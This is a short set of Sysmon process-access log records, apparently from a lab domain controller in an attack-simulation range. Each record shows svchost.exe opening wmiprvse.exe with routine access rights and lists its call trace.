{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1036,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1037,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1038,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1039,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1040,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1041,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1042,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1043,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
